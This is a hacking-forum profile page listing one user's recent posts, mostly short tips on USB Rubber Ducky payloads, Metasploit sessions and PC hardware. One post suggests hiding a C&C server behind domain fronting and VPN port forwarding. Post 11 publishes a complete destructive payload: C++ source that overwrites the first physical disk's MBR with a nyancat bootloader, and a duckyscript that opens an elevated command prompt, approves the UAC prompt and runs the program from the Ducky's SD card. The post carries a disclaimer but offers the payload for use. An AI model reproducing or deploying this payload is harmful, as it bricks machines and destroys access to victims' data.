
ThoughtfulDev

Active Members
  • Posts: 66
  • Joined
  • Last visited
  • Days Won: 1

1 Follower

Contact Methods

  • Website URL
    https://thoughtful-dev.com

Profile Information

  • Gender
    Not Telling
  • Location
    Krypton

Recent Profile Visitors

1,778 profile views

ThoughtfulDev's Achievements

Newbie (1/14)

  1. How about using Domain Fronting? You can connect your C&C server to a VPN with port forwarding and then let the shell connect to that port on the VPN side, which will then be forwarded to your C&C... in theory.
  2. be quiet! Silent Base 800 Black, No Window
     ASUS Prime X370-Pro
     AMD Ryzen 7 1700X
     2x8GB Vengeance DDR4-3200
     be quiet! Silent Loop 120mm
     MSI GTX 770
     Samsung 850 Evo 250GB SSD
     550 Watt Corsair Semi Modular PSU (don't know the actual name rn)
     Wanted to buy a new GPU for Machine Learning but prices are so damn high...
  3. Did you change the keyboard layout to "es" when compiling the duckyscript?
  4. Reminds me of my PyDuckGen. But it seems like your script works ;) (I'll have a look if I can improve your script.)
  5. I guess that this is not possible, since no driver is loaded and/or can be installed if you aren't on Win/Linux/OSX.
  6. This is wrong: no quotes and no = are needed; it should look like this: STRING K0cj0mKMchAAAAAAAAAAC0MHOM6B-qtOB9zszza03NGx21eRsaKiurS
  7. That would be possible if he were using a BashBunny haha :) Since the ducky is only a HID, this won't work directly on the ducky.
  8. As far as I know the ducky can't do that on its own. Maybe you can write a bash/batch script to copy a random key/number into your clipboard and start that, and the ducky just presses CTRL+V to paste that random character?
  9. The Intel ones do work with e.g. Gallium OS (which is Ubuntu + the necessary Chromebook drivers). (I use it myself.)
  10. I don't get your problem? Session 1 was opened... so just use sessions to list your sessions and interact with them. This is basic Metasploit stuff... maybe you should have a look at Metasploit Minute.
  11. Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat... AMAZING)

      I made a payload to overwrite your bootloader with the nyancat bootloader, which will render your PC USELESS.

      CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC. USE A VM.

      1. Download the precompiled boot.exe (source code is here if you want to compile it yourself):

          #include <windows.h>
          #include <conio.h>
          #include <iostream>

          int main(int argc, char* argv[]) {
              DWORD dw;
              const char *pathToBin = "boot.bin";

              // Open the first physical disk; this needs administrator privileges.
              HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL,
                                        FILE_SHARE_READ | FILE_SHARE_WRITE, 0,
                                        OPEN_EXISTING, 0, 0);
              if (drive != INVALID_HANDLE_VALUE) {
                  // Open boot.bin (the nyanmbr image) for reading.
                  HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0,
                                             OPEN_EXISTING, 0, 0);
                  if (binary != INVALID_HANDLE_VALUE) {
                      DWORD size = GetFileSize(binary, 0);
                      if (size > 0) {
                          byte *mbr = new byte[size];
                          if (ReadFile(binary, mbr, size, &dw, 0)) {
                              std::cout << "Binary file successfully read!" << std::endl;
                              // Write the image over the first sector (the MBR).
                              if (WriteFile(drive, mbr, size, &dw, 0)) {
                                  std::cout << "First sector overwritten successfully!" << std::endl;
                              }
                              else std::cerr << "Fatal error! Can't override 1st sector!" << std::endl;
                          }
                          else std::cerr << "Error reading from binary file!" << std::endl;
                          delete[] mbr;
                      }
                      else std::cerr << "Invalid binary file!" << std::endl;
                      CloseHandle(binary);
                  }
                  else {
                      std::cerr << "Can't find the binary file to read from!" << std::endl;
                  }
                  CloseHandle(drive);
              }
              else std::cerr << "Administrator privileges required!" << std::endl;
              return 0;
          }

      2. Create a folder named exec on your ducky SD card and copy boot.exe into it.
      3. Download the img file from https://github.com/brainsmoke/nyanmbr, rename it to boot.bin and put it in DUCKY\exec\boot.bin
      4. Here is the duckyscript (make sure your SD card is labeled DUCKY):

          REM I am NOT responsible for ANY DAMAGE
          REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr
          DELAY 5000
          ESCAPE
          DELAY 500
          CONTROL ESCAPE
          DELAY 500
          STRING cmd
          DELAY 500
          CTRL-SHIFT ENTER
          DELAY 1000
          REM replace with desired UAC alt + key combo (y for yes in English, j for German etc)
          ALT y
          DELAY 1500
          STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a
          ENTER
          DELAY 300
          STRING cd exec
          ENTER
          DELAY 300
          STRING boot.exe
          ENTER
          DELAY 1000
          STRING exit
          ENTER

      I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen), which makes generating payloads easier.

      boot.exe
  12. Try encoding in your keyboard layout (default is US).
  13. You can run PowerShell and cmd without admin privs, or am I mistaken? E.g. Ctrl+R and then powershell/cmd.exe will run it without admin privs.